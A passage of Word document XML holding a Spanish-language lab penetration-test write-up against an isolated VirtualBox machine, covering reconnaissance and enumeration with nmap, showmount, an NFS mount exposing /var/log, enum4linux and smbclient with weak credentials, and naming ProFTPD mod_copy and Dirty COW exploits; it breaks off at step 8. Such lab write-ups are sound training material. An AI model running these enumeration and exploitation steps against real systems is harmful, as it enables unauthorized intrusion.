                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Explotación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Obtención de acceso inicial mediante inyección de llave SSH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:shd w:fill="E4477A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IV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203A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalada de privilegios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Elevación de usuario estándar a root con un kernel vulnerable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:shd w:fill="45506B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203A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-explotación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Captura de evidencia, demostración de impacto y restauración.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">▍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Herramientas utilizadas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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Descubrimiento y escaneo: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netdiscover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nmap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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeración: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enum4linux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smbclient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smbmap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showmount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searchsploit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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Acceso y transferencia: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cliente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ftp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ssh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scp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ssh-keygen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netcat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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación: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ProFTPD mod_copy (CVE-2015-3306) y Dirty COW (CVE-2016-5195, Exploit-DB 40839 y 40616).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">04</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1EA7A0" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase I — Reconocimiento</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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El objetivo se aisló con un adaptador host-only de VirtualBox. Desde Kali (192.168.56.105) se descubrió el host y se mapearon sus servicios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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1EA7A0" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Descubrimiento del host y escaneo de servicios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Se barrió el segmento con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netdiscover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y se ejecutó un escaneo completo con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nmap -p- -sV -sC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. El objetivo expuso una amplia superficie de servicios de archivos: FTP (vsftpd y ProFTPD), SSH, SMB (Samba) y NFS.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ sudo netdiscover -r 192.168.56.0/24   # → 192.168.56.104</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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$ nmap -p- -sV -sC -oN nmap_full.txt 192.168.56.104</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 1 · Escaneo de puertos y servicios del objetivo.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideH w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideV w:val="single" w:color="D4DAE6" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="5060"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:shd w:fill="14203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Puerto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="14203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5060"/>
            <w:shd w:fill="14203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Observación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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3B2E5A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">21/tcp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vsftpd 3.0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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FTP con login anónimo y usuarios locales.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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3B2E5A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">22/tcp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OpenSSH 7.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Solo llave pública; PermitRootLogin yes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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3B2E5A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">139,445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Samba 4.9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Recursos print$, smbdata, smbuser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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3B2E5A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">111,2049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NFS / rpcbind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Exporta un recurso a la subred.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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3B2E5A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2121/tcp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ProFTPD 1.3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="50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Vulnerable a mod_copy (CVE-2015-3306).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">05</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B2E5A" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase II — Enumeración</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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Fase más extensa del ejercicio: se enumeraron los recursos compartidos, los usuarios y las configuraciones, obteniendo la inteligencia que definió el plan de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Enumeración de NFS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Se consultaron los recursos exportados por NFS con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showmount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. El servidor exportaba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/smbdata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a toda la subred sin restricción.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ showmount -e 192.168.56.104</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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Export list for 192.168.56.104:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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/smbdata  192.168.56.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 2 · Recurso NFS /smbdata exportado a toda la subred.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Montaje del recurso NFS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Al montar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/smbdata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se descubrió que, en realidad, contenía el directorio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">`/var/log`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del servidor: una grave exposición de las bitácoras del sistema.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ sudo mount -t nfs 192.168.56.104:/smbdata /tmp/nfs_mount</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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$ ls -la /tmp/nfs_mount   # anaconda, secure, messages, samba...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 3 · /smbdata expone el contenido de /var/log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Identificación de usuarios (SMB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Con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enum4linux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se enumeraron los usuarios del dominio. Se identificó la cuenta del sistema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">smbuser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(UID 1000).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ enum4linux -a 192.168.56.104   # → Local User 'smbuser' (RID 1000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 4 · Usuario smbuser identificado mediante RID cycling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Listado de recursos SMB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0" w:line="288"/>
      </w:pP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smbclient -L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reveló tres recursos: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print$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smbdata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y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smbuser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. Las credenciales débiles </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">`smbuser:smbuser`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otorgaron acceso autenticado.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ smbclient -L //192.168.56.104/ -U smbuser%smbuser</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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        smbdata    Disk    smbdata</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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        smbuser    Disk    smbuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 5 · Recursos compartidos de Samba enumerados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Acceso SMB autenticado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Con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smbuser:smbuser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se obtuvo una sesión SMB interactiva, confirmando la validez de la credencial.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ smbclient //192.168.56.104/smbuser -U smbuser%smbuser</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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smb: \&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 6 · Sesión SMB establecida como smbuser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Lectura del home de smbuser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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El recurso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smbuser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correspondía al home del usuario. Solo contenía archivos de shell (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.bashrc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.bash_profile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), sin llaves SSH ni credenciales — el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.bash_history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había sido vaciado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 7 · Contenido del home de smbuser (solo lectura).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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3B2E5A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Lectura de /var/log/secure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
